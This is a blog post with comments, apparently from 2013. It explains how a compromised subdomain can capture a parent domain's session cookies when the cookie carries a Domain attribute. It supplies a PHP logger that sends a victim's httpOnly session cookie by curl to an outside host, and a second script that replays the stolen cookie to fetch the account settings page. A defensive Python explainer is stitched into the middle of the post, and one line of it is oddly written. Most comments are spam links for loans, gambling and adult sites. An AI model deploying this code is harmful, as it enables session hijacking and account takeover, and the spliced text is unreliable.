Monday, 8 April 2013

Exploiting server-side vulns as client-side?!!

Sounds terrible, doesn't it? What this post describes is obvious, of course ;)

But sometimes this is an effective attack vector, for example whenever you can exploit some subdomain (news.your-target.com) but cannot exploit the main domain (your-target.com).

You can capture cookies on any subdomain even if they are protected by the httpOnly/Secure flags, because those flags restrict script access and plaintext transport, not which hosts receive the cookie.
Look at RFC 6265 http://tools.ietf.org/html/rfc6265:

4.1.2.3. The Domain Attribute
The Domain attribute specifies those hosts to which the cookie will be sent. For example, if the value of the Domain attribute is "example.com", the user agent will include the cookie in the Cookie header when making HTTP requests to example.com, www.example.com, and www.corp.example.com. (Note that a leading %x2E ("."), if present, is ignored even though that character is not permitted, but a trailing %x2E ("."), if present, will cause the user agent to ignore the attribute.) If the server omits the Domain attribute, the user agent will return the cookie only to the origin server.

Capturing cookies this way is possible when the main server sends a Set-Cookie header with the Domain attribute, so the browser also sends the cookie to every subdomain.
A logger to inject into the subdomain may look like:
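To make the scoping rule from the RFC quote concrete, here is an added example in Python (not code from the original post) that implements RFC 6265 domain matching and compares a Set-Cookie header carrying a Domain attribute with one that omits it. The host names, cookie value and header strings are constructed placeholders; the function names are my own.

```python
"""Which hosts receive a cookie? RFC 6265 scoping rules applied to two headers.

Added example, not from the original post. Implements:
  - domain-matching (RFC 6265 section 5.1.3): host equals the domain or is a
    subdomain of it;
  - Domain attribute handling (section 4.1.2.3 / 5.2.3): a leading "." is
    ignored, a trailing "." makes the attribute be ignored, and an omitted
    Domain yields a host-only cookie;
  - rejection of a cookie whose Domain the setting host does not match
    (section 5.3 step 6).
"""
from dataclasses import dataclass


@dataclass
class CookieScope:
    name: str
    domain: str        # cookie's domain (the origin host for host-only cookies)
    host_only: bool    # True when no usable Domain attribute was present
    secure: bool
    http_only: bool


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 5.1.3: the host is the domain itself or ends with '.' + domain."""
    request_host, cookie_domain = request_host.lower(), cookie_domain.lower()
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)


def parse_set_cookie(header: str, origin_host: str) -> CookieScope:
    """Parse only the attributes that decide where the cookie is sent."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    domain, secure, http_only = None, False, False
    for attr in parts[1:]:
        key, _, value = attr.partition("=")
        key, value = key.strip().lower(), value.strip().lower()
        if key == "domain":
            if value.endswith("."):
                continue                      # trailing dot: attribute ignored
            value = value.lstrip(".")         # leading dot: ignored
            if not value:
                continue
            if not domain_matches(origin_host, value):
                raise ValueError("origin does not match Domain; cookie rejected")
            domain = value
        elif key == "secure":
            secure = True
        elif key == "httponly":
            http_only = True
    if domain is None:
        return CookieScope(name, origin_host.lower(), True, secure, http_only)
    return CookieScope(name, domain, False, secure, http_only)


def cookie_accepted(header: str, origin_host: str) -> bool:
    """True if a user agent would store the cookie at all."""
    try:
        parse_set_cookie(header, origin_host)
        return True
    except ValueError:
        return False


def is_sent_to(cookie: CookieScope, request_host: str, https: bool) -> bool:
    """Would the user agent attach this cookie to a request to request_host?"""
    if cookie.secure and not https:
        return False
    if cookie.host_only:
        return request_host.lower() == cookie.domain
    return domain_matches(request_host, cookie.domain)


def exposed_hosts(cookie: CookieScope, hosts: list) -> list:
    """Hosts (over HTTPS) that receive the cookie; for a Domain cookie this
    includes every subdomain, which is exactly what the attack relies on."""
    return [h for h in hosts if is_sent_to(h and cookie, h, https=True)]


# Constructed sample data: a weak header with Domain, and the same cookie without it.
WEAK_HEADER = "session_id=abc123; Domain=target.com; Path=/; Secure; HttpOnly"
HARDENED_HEADER = "session_id=abc123; Path=/; Secure; HttpOnly"
SAMPLE_HOSTS = ["target.com", "www.target.com", "news.target.com",
                "evil-target.com", "target.com.evil.example"]

if __name__ == "__main__":
    for label, header in (("weak", WEAK_HEADER), ("hardened", HARDENED_HEADER)):
        scope = parse_set_cookie(header, "target.com")
        print(label, "->", exposed_hosts(scope, SAMPLE_HOSTS))
```

Run it and the Domain form reaches target.com and both subdomains, while the host-only form reaches target.com alone; the two look-alike hosts are never matched because matching requires a full "." + domain suffix. The practical mitigation this shows is to omit the Domain attribute on session cookies (or use a separate cookie for subdomains that need one) so a compromised subdomain cannot receive the main site's session.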
<?php
session_start(); // required before $_SESSION can be used
// React once per session, and only to cookies that match the expected format
// (replace ASYOUWANT with the pattern you want; the anchors must be ^...$).
if(!isset($_COOKIE['session_id']) || !preg_match('/^ASYOUWANT$/s',$_COOKIE['session_id']) || isset($_SESSION['already_logged'])){
   //do nothing
}else{
   //exec called for asynchronous request; the trailing & belongs inside the command string
   exec("curl http://security-auditor.com/sniffer.php?session_id=".$_COOKIE['session_id']." &");//httpOnly cookie of course
   $_SESSION['already_logged']=true;
}
?>
Simple code for the described sniffer is listed below:
<?php
$ssid = @$_GET['session_id'];
if($ssid!=""){
  // download the page as the client would, presenting the captured cookie
  $opts = array(
    'http'=>array(
      'method'=>"GET",
      'header'=>"Accept-language: en\r\n" .
                "Cookie: session_id=$ssid;\r\n"
    )
  );
  $context = stream_context_create($opts);
  $file = file_get_contents('https://target.com/settings', false, $context);
  // store the cookie together with the fetched page, once per session id
  if(!file_exists("/tmp/sess-$ssid")){
    file_put_contents("/tmp/sess-$ssid","Cookie: session_id=$ssid; \n".$file );
  }
}
?>

28 comments:

  1. What if the sub-domain has a CMS, i.e. WordPress, and the main domain has static content or another CMS; does it work?

  2. There is no difference in the subdomain's CMS.
    If the main domain sends "Set-cookie: " with a domain= attribute, this should work.

  3. On the off chance that you don't have credit, or you have terrible credit, and you don't have the money, how is that bill paid? If not for payday advances, that bill wouldn't be paid.
    Check Cashing San-diego

  4. So in the event that you require money quick, a bank advance is not for you. Bank credits work preferred for arranged costs over for unanticipated money related crises.
    Cash Advance Chicago

  5. So what do you do? Given the innovative headway, you can essentially sign on to an online fund website that gives quick loans.
    Payday Loans Chula-vista

  6. Since this kind of advance is regularly less demanding to acquire than a conventional bank credit, you'll have the capacity to rapidly get the money you have to dispatch a mid year business. Car Title Loans

  7. Thanks for sharing, nice post! The post really provides useful information!

    Giaonhan247 specializes in services for buying goods from the US online, guides on how to buy cheap goods on eBay, along with freight shipping of goods to Cambodia, and answers what is worth buying on eBay to send to Vietnam reliably, and whether buying on Amazon is taxed and how that is calculated.

  8. Thanks for sharing this..

    3E Accounting Malaysia is the best company to hire while Company registration

  9. Download the Moochin series
    http://filmhayeiranijadid.tinysite.ir/post/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%B3%D8%B1%DB%8C%D8%A7%D9%84-%D9%85%D9%88%DA%86%DB%8C%D9%86/

  10. Download the Moochin series
    http://20dl1.parsiblog.com/Posts/215/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af+%d8%b3%d8%b1%d9%8a%d8%a7%d9%84+%d9%85%d9%88%da%86%d9%8a%d9%86/

  11. Download the Moochin series
    http://downloadfilmirani7.loxblog.com/post/147/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF%20%D8%B3%D8%B1%DB%8C%D8%A7%D9%84%20%D9%85%D9%88%DA%86%DB%8C%D9%86.htm

  12. Can you explain to me how this code works? I am new to server-side systems so I don't have any knowledge of how it works. And if you can elaborate or explain it to me point by point, I will really appreciate it. On the other hand, while I am waiting for you to come back, I will continue my playing and, by the way, the game I am playing right now is granny 3. Read more about this game by clicking the link here.


  13. Similar to a limited liability company, the owners of company shares can be either legal entities or natural persons. However, unlike a limited liability company, JSC shares can be bought and sold publicly. The maximum number of shares is unlimited and additional shares can be issued during the term of the company. There are different types of stocks, and typically the voting and dividend rights of shareholders depend on the category of stocks. Shareholders usually have the right to express their views on corporate governance and other matters such as the distribution of profits and the appointment of the council. All shareholder decisions are made during a shareholders' meeting. http://www.confiduss.com/en/info/blog/article/latvia-jsc-company-incorporation/

  14. Hello very cool web site!! Man .. Excellent .. Wonderful .. I’ll bookmark your website and take the feeds also? I’m happy to find numerous useful info here within the submit, homework writing service we need develop more strategies on this regard, thank you for sharing. . . .

  15. I like this site because there is so much useful stuff on here. Enjoyed reading through this, very good, thank you. 야한동영상

    Click this link
    야설

  16. Can I just say what a relief it is to find someone who actually knows what they're talking about on the internet. You definitely know how to bring an issue to light and make it important. More people need to read this and understand this side of the story. I can't believe you're not more popular, because you definitely have the gift.

    Click Here
    Visit Web
    Scca.com
    Information
    Click Here

  17. You're so cool! I don't suppose I've read anything like this before. So nice to find somebody with some original thoughts on this subject. Really, thank you for starting this up. This website is something that is needed on the web, someone with a little originality. Useful job for bringing something new to the internet!

    Visit Web
    Galaxyforums.net
    Information
    Click Here
    Visit Web

  18. Play Free Online Slots For Fun88
    Fun88 is a fun online casino also planet win 365 known 1xbet as Fun88 fun88 soikeotot and has over 80 different online slots, free spins and other types of games. This casino offers

  19. While the author is making the first, custom Best Website To Buy Essays composition, clients can mind progress, talk with the essayist, and add any extra data they need.

  20. HAVE A GREAT DAY TO THE CREATOR OF THIS WONDERFUL ARTICLE, I AM EXTREMELY INSPIRED WHILE HAVING READ THIS, SUPER NICE INFORMATION, THANKS FOR SHARING!
    스포츠토토

  21. HELLO, I JUST WANTED TO SAY THANK YOU FOR THIS ARTICLE THAT YOU'VE SHARED TO EVERYONE.
    STAY SAFE!
    일본야동

  22. Congratulations. This is quite a good blog. Keep sharing. I love them. Are you also searching for nursing writing help? We are the best solution for you.

  23. long coat that comes all around protected and a hood fixed with black widow 2021 black cotton jacket mens fur. You will find various sorts of fur around your parka hood. Either this fur is genuine or false relying upon the brand and cost of the parka.

  24. In web development, 'client side' refers to everything in a web application that is displayed or takes place on the client bulk email verifier. This includes what the user sees, such as text, images, and the rest of the UI, along with any actions that an application performs within the user's browser.
